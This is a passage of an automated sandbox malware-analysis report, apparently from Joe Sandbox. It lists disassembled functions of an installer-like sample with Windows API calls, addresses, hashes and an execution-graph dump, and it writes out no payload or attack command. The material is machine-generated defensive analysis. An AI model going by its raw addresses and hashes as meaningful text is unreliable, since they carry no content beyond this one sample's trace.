                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                                            • Opcode ID: 2805e2fef8e2214fa477a8ec2049f3ffea8576bf178287afc38038c4ebd22c98
                                                                                                                                                                                                                                                            • Instruction ID: 88b26e9906af5102263966012afcf55239f243e012ae5610a95420d2852cecde
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2805e2fef8e2214fa477a8ec2049f3ffea8576bf178287afc38038c4ebd22c98
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11118E7150124DABDB10EF68ED08ABE77B8EB49300F12C154EA16D2290DA31AE52DBB5
                                                                                                                                                                                                                                                            Function 00DF47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00DF4E6F), ref: 00DF47EA
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00DF4823
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00DF4847
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00DF4851
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                            • API String ID: 359063898-305352358
                                                                                                                                                                                                                                                            • Opcode ID: eb647daf5c25363fc14ee7fa927ea1621fb2ad78f61839043de5c38ff553ae69
                                                                                                                                                                                                                                                            • Instruction ID: 509138e9ee832299b62f08ef0fee8a4cd3f6e15265c1f8fcbf4f0541997612f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb647daf5c25363fc14ee7fa927ea1621fb2ad78f61839043de5c38ff553ae69
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 211102B9604745AFE7149F28AC18F733B5AEB85350B0AC519EB86DB341DA359C06C670
                                                                                                                                                                                                                                                            Function 00DF3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DF369F
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DF36B2
                                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00DF36CB
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DF36DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                                            • Opcode ID: a9d852b1ee1457169dc7b2d53606819784b5c4eac82843c1d2ce7258046308b4
                                                                                                                                                                                                                                                            • Instruction ID: 47d9382feff2def1da8ed0ac0f376c107bd914f1f6ca9bc3682be494a0f1f022
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9d852b1ee1457169dc7b2d53606819784b5c4eac82843c1d2ce7258046308b4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D901A77290035977DB304BAA5C48EFF777CEBC5B10F074119FA09E2280D560C640C670
                                                                                                                                                                                                                                                            Function 00DF6517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00DF0000,000007D6,00000005), ref: 00DF652A
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00DF0000,00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DF6538
                                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00DF0000,00000000,00000547,00DF19E0,00000000), ref: 00DF6557
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DF6560
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                                            • Opcode ID: 3b22c3d47381334761c06c7afd695a5631fbe962e8776e45549285bc086ca019
                                                                                                                                                                                                                                                            • Instruction ID: 9ca61a793d3df5412391513c28897dbe189f4cff64f64f525bdfb852369fdcb4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b22c3d47381334761c06c7afd695a5631fbe962e8776e45549285bc086ca019
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE01F2B2100309BBCB105F69AC48DBB7A6CEB85360F068125FF08E3254DB72CD10C6B1
                                                                                                                                                                                                                                                            Function 00DF65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,?,00000000,00DF2B33), ref: 00DF6602
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00DF6612
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00DF6629
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00DF6635
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                                            • Opcode ID: 509d782b1924f2dbc2edeb580d811bedacfb6baacb0fab2b11f0f648540b5a47
                                                                                                                                                                                                                                                            • Instruction ID: bc543d02de143f063a988bcdf458f4229642fc5d25f3c144b0e4a6d480ab4125
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 509d782b1924f2dbc2edeb580d811bedacfb6baacb0fab2b11f0f648540b5a47
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0F9710042556ED7321B284CC89B7AF9CCB87254B1F81EFE595D2601D6154D46C771

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:29.3%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                            Total number of Nodes:927
                                                                                                                                                                                                                                                            Total number of Limit Nodes:45
                                                                                                                                                                                                                                                            execution_graph 2087 626a60 2104 627155 2087->2104 2089 626a65 2090 626a76 GetStartupInfoW 2089->2090 2091 626a93 2090->2091 2092 626aa8 2091->2092 2093 626aaf Sleep 2091->2093 2094 626ac7 _amsg_exit 2092->2094 2096 626ad1 2092->2096 2093->2091 2094->2096 2095 626b13 _initterm 2099 626b2e __IsNonwritableInCurrentImage 2095->2099 2096->2095 2098 626af4 2096->2098 2096->2099 2097 626bd6 _ismbblead 2097->2099 2099->2097 2101 626c1e 2099->2101 2102 626bbe exit 2099->2102 2109 622bfb GetVersion 2099->2109 2101->2098 2103 626c27 _cexit 2101->2103 2102->2099 2103->2098 2105 62717a 2104->2105 2106 62717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2104->2106 2105->2106 2107 6271e2 2105->2107 2108 6271cd 2106->2108 2107->2089 2108->2107 2110 622c50 2109->2110 2111 622c0f 2109->2111 2126 622caa memset memset memset 2110->2126 2111->2110 2112 622c13 GetModuleHandleW 2111->2112 2112->2110 2115 622c22 GetProcAddress 2112->2115 2115->2110 2121 622c34 2115->2121 2116 622c8e 2118 622c97 CloseHandle 2116->2118 2119 622c9e 2116->2119 2118->2119 2119->2099 2121->2110 2124 622c89 2219 621f90 2124->2219 2236 62468f FindResourceA SizeofResource 2126->2236 2129 622e30 2132 6244b9 20 API calls 2129->2132 2130 622d2d CreateEventA SetEvent 2131 62468f 7 API calls 2130->2131 2133 622d57 2131->2133 2134 622e4d 2132->2134 2135 622d5b 2133->2135 2137 622d8a 2133->2137 2138 622e1f 2133->2138 2268 626ce0 2134->2268 2273 6244b9 2135->2273 2141 62468f 7 API calls 2137->2141 2241 625c9e 2138->2241 2144 622d9f 2141->2144 2142 622c62 2142->2116 2168 622f1d 2142->2168 2144->2135 2146 622da3 CreateMutexA 2144->2146 2145 622e3a 2148 622e52 FindResourceA 2145->2148 2149 622e43 2145->2149 2146->2138 2147 622dbd GetLastError 2146->2147 2147->2138 2150 622dca 2147->2150 2151 622e64 LoadResource 2148->2151 2152 622e6e 2148->2152 2302 622390 2149->2302 2154 622dd5 2150->2154 2155 622dea 2150->2155 2151->2152 2152->2134 2158 622e8b 2152->2158 2156 6244b9 20 API calls 2154->2156 2157 6244b9 20 API calls 2155->2157 2159 622de8 2156->2159 2160 622dff 2157->2160 2317 6236ee GetVersionExA 2158->2317 2162 622e04 CloseHandle 2159->2162 2160->2138 2160->2162 2162->2134 2167 622d6e 2167->2134 2169 622f3f 2168->2169 2170 622f64 2168->2170 2172 622f4d 2169->2172 2441 6251e5 2169->2441 2200 623041 2170->2200 2480 625164 2170->2480 2172->2170 2172->2200 2461 623a3f 2172->2461 2174 622f71 2174->2200 2495 6255a0 2174->2495 2178 626ce0 4 API calls 2179 622c6b 2178->2179 2206 6252b6 2179->2206 2180 622f86 GetSystemDirectoryA 2181 62658a CharPrevA 2180->2181 2182 622fab LoadLibraryA 2181->2182 2183 622fc0 GetProcAddress 2182->2183 2184 622ff7 FreeLibrary 2182->2184 2183->2184 2187 622fd6 DecryptFileA 2183->2187 2185 623006 2184->2185 2186 623017 SetCurrentDirectoryA 2184->2186 2185->2186 2545 62621e GetWindowsDirectoryA 2185->2545 2188 623026 2186->2188 2189 623054 2186->2189 2187->2184 2194 622ff0 2187->2194 2193 6244b9 20 API calls 2188->2193 2191 623061 2189->2191 2556 623b26 2189->2556 2191->2200 2202 62307a 2191->2202 2565 62256d 2191->2565 2197 623037 2193->2197 2194->2184 2626 626285 GetLastError 2197->2626 2200->2178 2201 623098 2201->2200 2613 624169 2201->2613 2202->2201 2576 623ba2 2202->2576 2207 6252d6 2206->2207 2214 625316 2206->2214 2208 625300 LocalFree LocalFree 2207->2208 2210 6252eb SetFileAttributesA DeleteFileA 2207->2210 2208->2207 2208->2214 2209 62538c 2211 626ce0 4 API calls 2209->2211 2210->2208 2213 622c72 2211->2213 2213->2116 2213->2124 2215 62535e SetCurrentDirectoryA 2214->2215 2217 6265e8 4 API calls 2214->2217 2218 625374 2214->2218 2216 622390 13 API calls 2215->2216 2216->2218 2217->2215 2218->2209 2948 621fe1 2218->2948 2220 621f9f 2219->2220 2221 621f9a 2219->2221 2223 621fc0 2220->2223 2224 6244b9 20 API calls 2220->2224 2228 621fd9 2220->2228 2222 621ea7 15 API calls 2221->2222 2222->2220 2225 621ee2 GetCurrentProcess OpenProcessToken 2223->2225 2226 621fcf ExitWindowsEx 2223->2226 2223->2228 2224->2223 2229 621f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2225->2229 2230 621f0e 2225->2230 2226->2228 2228->2116 2229->2230 2231 621f6b ExitWindowsEx 2229->2231 2233 6244b9 20 API calls 2230->2233 2231->2230 2232 621f1f 2231->2232 2234 626ce0 4 API calls 2232->2234 2233->2232 2235 621f8c 2234->2235 2235->2116 2237 6246b6 2236->2237 2238 622d1a 2236->2238 2237->2238 2239 6246be FindResourceA LoadResource LockResource 2237->2239 2238->2129 2238->2130 2239->2238 2240 6246df memcpy_s FreeResource 2239->2240 2240->2238 2242 6260fb 2241->2242 2252 625cc3 2241->2252 2244 626ce0 4 API calls 2242->2244 2243 625dd0 2243->2242 2247 625dec GetModuleFileNameA 2243->2247 2245 622e2c 2244->2245 2245->2129 2245->2145 2246 625ced CharNextA 2246->2252 2248 625e0a 2247->2248 2249 625e17 2247->2249 2359 6266c8 2248->2359 2249->2242 2251 626218 2368 626e2a 2251->2368 2252->2242 2252->2243 2252->2246 2252->2251 2255 625e36 CharUpperA 2252->2255 2261 625f9f CharUpperA 2252->2261 2262 625f59 CompareStringA 2252->2262 2263 626003 CharUpperA 2252->2263 2264 625edc CharUpperA 2252->2264 2265 6260a2 CharUpperA 2252->2265 2266 62667f IsDBCSLeadByte CharNextA 2252->2266 2364 62658a 2252->2364 2255->2252 2256 6261d0 2255->2256 2257 6244b9 20 API calls 2256->2257 2258 6261e7 2257->2258 2259 6261f0 CloseHandle 2258->2259 2260 6261f7 ExitProcess 2258->2260 2259->2260 2261->2252 2262->2252 2263->2252 2264->2252 2265->2252 2266->2252 2269 626ceb 2268->2269 2270 626ce8 2268->2270 2375 626cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2269->2375 2270->2142 2272 626e26 2272->2142 2274 62455a 2273->2274 2275 6244fe LoadStringA 2273->2275 2278 626ce0 4 API calls 2274->2278 2276 624562 2275->2276 2277 624527 2275->2277 2282 6245c9 2276->2282 2289 62457e 2276->2289 2376 62681f 2277->2376 2280 624689 2278->2280 2280->2167 2285 624607 LocalAlloc 2282->2285 2286 6245cd LocalAlloc 2282->2286 2283 624536 MessageBoxA 2283->2274 2285->2274 2296 6245c4 2285->2296 2286->2274 2290 6245f3 2286->2290 2289->2289 2292 624596 LocalAlloc 2289->2292 2293 62171e _vsnprintf 2290->2293 2291 62462d MessageBeep 2294 62681f 10 API calls 2291->2294 2292->2274 2295 6245af 2292->2295 2293->2296 2297 62463b 2294->2297 2393 62171e 2295->2393 2296->2291 2299 624645 MessageBoxA LocalFree 2297->2299 2301 6267c9 EnumResourceLanguagesA 2297->2301 2299->2274 2301->2299 2303 6224cb 2302->2303 2306 6223b9 2302->2306 2304 626ce0 4 API calls 2303->2304 2305 6224dc 2304->2305 2305->2134 2306->2303 2307 6223e9 FindFirstFileA 2306->2307 2307->2303 2308 622407 2307->2308 2309 622421 lstrcmpA 2308->2309 2311 6224a9 FindNextFileA 2308->2311 2312 622479 2308->2312 2315 62658a CharPrevA 2308->2315 2316 622390 5 API calls 2308->2316 2310 622431 lstrcmpA 2309->2310 2309->2311 2310->2308 2310->2311 2311->2308 2314 6224bd FindClose RemoveDirectoryA 2311->2314 2313 622488 SetFileAttributesA DeleteFileA 2312->2313 2313->2311 2314->2303 2315->2308 2316->2308 2321 623737 2317->2321 2322 62372d 2317->2322 2318 6244b9 20 API calls 2331 6239fc 2318->2331 2319 626ce0 4 API calls 2320 622e92 2319->2320 2320->2134 2320->2167 2332 6218a3 2320->2332 2321->2322 2324 6238a4 2321->2324 2321->2331 2403 6228e8 2321->2403 2322->2318 2322->2331 2324->2322 2325 6239c1 MessageBeep 2324->2325 2324->2331 2326 62681f 10 API calls 2325->2326 2327 6239ce 2326->2327 2328 6239d8 MessageBoxA 2327->2328 2329 6267c9 EnumResourceLanguagesA 2327->2329 2328->2331 2329->2328 2331->2319 2333 6218d5 2332->2333 2339 6219b8 2332->2339 2432 6217ee LoadLibraryA 2333->2432 2335 626ce0 4 API calls 2337 6219d5 2335->2337 2337->2167 2352 626517 FindResourceA 2337->2352 2338 6218e5 GetCurrentProcess OpenProcessToken 2338->2339 2340 621900 GetTokenInformation 2338->2340 2339->2335 2341 6219aa CloseHandle 2340->2341 2342 621918 GetLastError 2340->2342 2341->2339 2342->2341 2343 621927 LocalAlloc 2342->2343 2344 621938 GetTokenInformation 2343->2344 2345 6219a9 2343->2345 2346 6219a2 LocalFree 2344->2346 2347 62194e AllocateAndInitializeSid 2344->2347 2345->2341 2346->2345 2347->2346 2348 62196e 2347->2348 2349 621999 FreeSid 2348->2349 2350 621975 EqualSid 2348->2350 2351 62198c 2348->2351 2349->2346 2350->2348 2350->2351 2351->2349 2353 626536 LoadResource 2352->2353 2354 62656b 2352->2354 2353->2354 2356 626544 DialogBoxIndirectParamA FreeResource 2353->2356 2355 6244b9 20 API calls 2354->2355 2357 62657c 2355->2357 2356->2354 2356->2357 2357->2167 2362 6266d5 2359->2362 2360 6266f3 2360->2249 2362->2360 2363 6266e5 CharNextA 2362->2363 2371 626648 2362->2371 2363->2362 2365 62659b 2364->2365 2366 6265b8 CharPrevA 2365->2366 2367 6265ab 2365->2367 2366->2367 2367->2252 2374 626cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2368->2374 2370 62621d 2372 626668 2371->2372 2373 62665d IsDBCSLeadByte 2371->2373 2372->2362 2373->2372 2374->2370 2375->2272 2377 626857 GetVersionExA 2376->2377 2386 62691a 2376->2386 2379 62687c 2377->2379 2377->2386 2378 626ce0 4 API calls 2380 62452c 2378->2380 2381 6268a5 GetSystemMetrics 2379->2381 2379->2386 2380->2283 2387 6267c9 2380->2387 2382 6268b5 RegOpenKeyExA 2381->2382 2381->2386 2383 6268d6 RegQueryValueExA RegCloseKey 2382->2383 2382->2386 2384 62690c 2383->2384 2383->2386 2397 6266f9 2384->2397 2386->2378 2388 6267e2 2387->2388 2391 626803 2387->2391 2401 626793 EnumResourceLanguagesA 2388->2401 2390 6267f5 2390->2391 2402 626793 EnumResourceLanguagesA 2390->2402 2391->2283 2394 62172d 2393->2394 2395 62173d _vsnprintf 2394->2395 2396 62175d 2394->2396 2395->2396 2396->2296 2400 62670f 2397->2400 2398 626740 CharNextA 2398->2400 2399 62674b 2399->2386 2400->2398 2400->2399 2401->2390 2402->2391 2404 622a62 2403->2404 2411 62290d 2403->2411 2405 622a75 2404->2405 2406 622a6e GlobalFree 2404->2406 2405->2324 2406->2405 2408 622955 GlobalAlloc 2408->2404 2409 622968 GlobalLock 2408->2409 2409->2404 2409->2411 2410 622a20 GlobalUnlock 2410->2411 2411->2404 2411->2408 2411->2410 2412 622a80 GlobalUnlock 2411->2412 2413 622773 2411->2413 2412->2404 2414 6228b2 2413->2414 2415 6227a3 CharUpperA CharNextA CharNextA 2413->2415 2416 6228b7 GetSystemDirectoryA 2414->2416 2415->2416 2417 6227db 2415->2417 2420 6228bf 2416->2420 2418 6227e3 2417->2418 2419 6228a8 GetWindowsDirectoryA 2417->2419 2424 62658a CharPrevA 2418->2424 2419->2420 2421 6228d2 2420->2421 2422 62658a CharPrevA 2420->2422 2423 626ce0 4 API calls 2421->2423 2422->2421 2425 6228e2 2423->2425 2426 622810 RegOpenKeyExA 2424->2426 2425->2411 2426->2420 2427 622837 RegQueryValueExA 2426->2427 2428 62289a RegCloseKey 2427->2428 2429 62285c 2427->2429 2428->2420 2430 622867 ExpandEnvironmentStringsA 2429->2430 2431 62287a 2429->2431 2430->2431 2431->2428 2433 621890 2432->2433 2434 621826 GetProcAddress 2432->2434 2437 626ce0 4 API calls 2433->2437 2435 621889 FreeLibrary 2434->2435 2436 621839 AllocateAndInitializeSid 2434->2436 2435->2433 2436->2435 2440 62185f FreeSid 2436->2440 2438 62189f 2437->2438 2438->2338 2438->2339 2440->2435 2442 62468f 7 API calls 2441->2442 2443 6251f9 LocalAlloc 2442->2443 2444 62522d 2443->2444 2445 62520d 2443->2445 2447 62468f 7 API calls 2444->2447 2446 6244b9 20 API calls 2445->2446 2448 62521e 2446->2448 2449 62523a 2447->2449 2450 626285 GetLastError 2448->2450 2451 625262 lstrcmpA 2449->2451 2452 62523e 2449->2452 2460 625223 2450->2460 2454 625272 LocalFree 2451->2454 2455 62527e 2451->2455 2453 6244b9 20 API calls 2452->2453 2457 62524f LocalFree 2453->2457 2456 625279 2454->2456 2458 6244b9 20 API calls 2455->2458 2456->2172 2457->2456 2459 625290 LocalFree 2458->2459 2459->2460 2460->2456 2462 62468f 7 API calls 2461->2462 2463 623a55 LocalAlloc 2462->2463 2464 623a8e 2463->2464 2465 623a6c 2463->2465 2467 62468f 7 API calls 2464->2467 2466 6244b9 20 API calls 2465->2466 2468 623a7d 2466->2468 2469 623a98 2467->2469 2470 626285 GetLastError 2468->2470 2471 623ac5 lstrcmpA 2469->2471 2472 623a9c 2469->2472 2476 623a82 2470->2476 2474 623ada 2471->2474 2475 623b0d LocalFree 2471->2475 2473 6244b9 20 API calls 2472->2473 2477 623aad LocalFree 2473->2477 2478 626517 24 API calls 2474->2478 2475->2476 2476->2170 2477->2476 2479 623aec LocalFree 2478->2479 2479->2476 2481 62468f 7 API calls 2480->2481 2482 625175 2481->2482 2483 62517a 2482->2483 2484 6251af 2482->2484 2485 6244b9 20 API calls 2483->2485 2486 62468f 7 API calls 2484->2486 2487 62518d 2485->2487 2488 6251c0 2486->2488 2487->2174 2628 626298 2488->2628 2492 6251e1 2492->2174 2493 6251ce 2494 6244b9 20 API calls 2493->2494 2494->2487 2496 62468f 7 API calls 2495->2496 2497 6255c7 LocalAlloc 2496->2497 2498 6255db 2497->2498 2499 6255fd 2497->2499 2500 6244b9 20 API calls 2498->2500 2501 62468f 7 API calls 2499->2501 2502 6255ec 2500->2502 2503 62560a 2501->2503 2504 626285 GetLastError 2502->2504 2505 625632 lstrcmpA 2503->2505 2506 62560e 2503->2506 2507 6255f1 2504->2507 2509 625645 2505->2509 2510 62564b LocalFree 2505->2510 2508 6244b9 20 API calls 2506->2508 2533 6255f6 2507->2533 2511 62561f LocalFree 2508->2511 2509->2510 2512 625696 2510->2512 2513 62565b 2510->2513 2511->2533 2514 62589f 2512->2514 2517 6256ae GetTempPathA 2512->2517 2518 625467 49 API calls 2513->2518 2515 626517 24 API calls 2514->2515 2515->2533 2516 626ce0 4 API calls 2519 622f7e 2516->2519 2520 6256eb 2517->2520 2521 6256c3 2517->2521 2522 625678 2518->2522 2519->2180 2519->2200 2527 625717 GetDriveTypeA 2520->2527 2528 62586c GetWindowsDirectoryA 2520->2528 2520->2533 2640 625467 2521->2640 2524 625680 2522->2524 2522->2533 2526 6244b9 20 API calls 2524->2526 2526->2507 2529 625730 GetFileAttributesA 2527->2529 2543 62572b 2527->2543 2674 62597d GetCurrentDirectoryA SetCurrentDirectoryA 2528->2674 2529->2543 2533->2516 2534 625467 49 API calls 2534->2520 2535 622630 21 API calls 2535->2543 2537 6257c1 GetWindowsDirectoryA 2537->2543 2538 62658a CharPrevA 2540 6257e8 GetFileAttributesA 2538->2540 2539 62597d 34 API calls 2539->2543 2541 6257fa CreateDirectoryA 2540->2541 2540->2543 2541->2543 2542 625827 SetFileAttributesA 2542->2543 2543->2527 2543->2528 2543->2529 2543->2533 2543->2535 2543->2537 2543->2538 2543->2539 2543->2542 2544 625467 49 API calls 2543->2544 2670 626952 2543->2670 2544->2543 2546 626268 2545->2546 2547 626249 2545->2547 2549 62597d 34 API calls 2546->2549 2548 6244b9 20 API calls 2547->2548 2550 62625a 2548->2550 2551 626277 2549->2551 2552 626285 GetLastError 2550->2552 2553 626ce0 4 API calls 2551->2553 2554 62625f 2552->2554 2555 623013 2553->2555 2554->2551 2555->2186 2555->2200 2557 623b2d 2556->2557 2557->2557 2558 623b72 2557->2558 2559 623b53 2557->2559 2741 624fe0 2558->2741 2561 626517 24 API calls 2559->2561 2562 623b70 2561->2562 2563 626298 10 API calls 2562->2563 2564 623b7b 2562->2564 2563->2564 2564->2191 2566 622622 2565->2566 2567 622583 2565->2567 2795 6224e0 GetWindowsDirectoryA 2566->2795 2569 62258b 2567->2569 2570 6225e8 RegOpenKeyExA 2567->2570 2571 6225e3 2569->2571 2573 62259b RegOpenKeyExA 2569->2573 2570->2571 2572 622609 RegQueryInfoKeyA 2570->2572 2571->2202 2574 6225d1 RegCloseKey 2572->2574 2573->2571 2575 6225bc RegQueryValueExA 2573->2575 2574->2571 2575->2574 2577 623bdb 2576->2577 2592 623bec 2576->2592 2578 62468f 7 API calls 2577->2578 2578->2592 2579 623c03 memset 2579->2592 2580 623d13 2581 6244b9 20 API calls 2580->2581 2582 623d26 2581->2582 2584 623f4d 2582->2584 2585 626ce0 4 API calls 2584->2585 2586 623f60 2585->2586 2586->2201 2587 623fd7 2587->2584 2893 622267 2587->2893 2588 623d7b CompareStringA 2588->2587 2588->2592 2589 623fab 2593 6244b9 20 API calls 2589->2593 2592->2579 2592->2580 2592->2584 2592->2587 2592->2588 2592->2589 2594 62468f 7 API calls 2592->2594 2595 623f46 LocalFree 2592->2595 2596 623f1e LocalFree 2592->2596 2600 623cc7 CompareStringA 2592->2600 2610 623e10 2592->2610 2803 621ae8 2592->2803 2843 62202a memset memset RegCreateKeyExA 2592->2843 2869 623fef 2592->2869 2598 623fbe LocalFree 2593->2598 2594->2592 2595->2584 2596->2587 2596->2592 2598->2584 2600->2592 2601 623f92 2604 6244b9 20 API calls 2601->2604 2602 623e1f GetProcAddress 2603 623f64 2602->2603 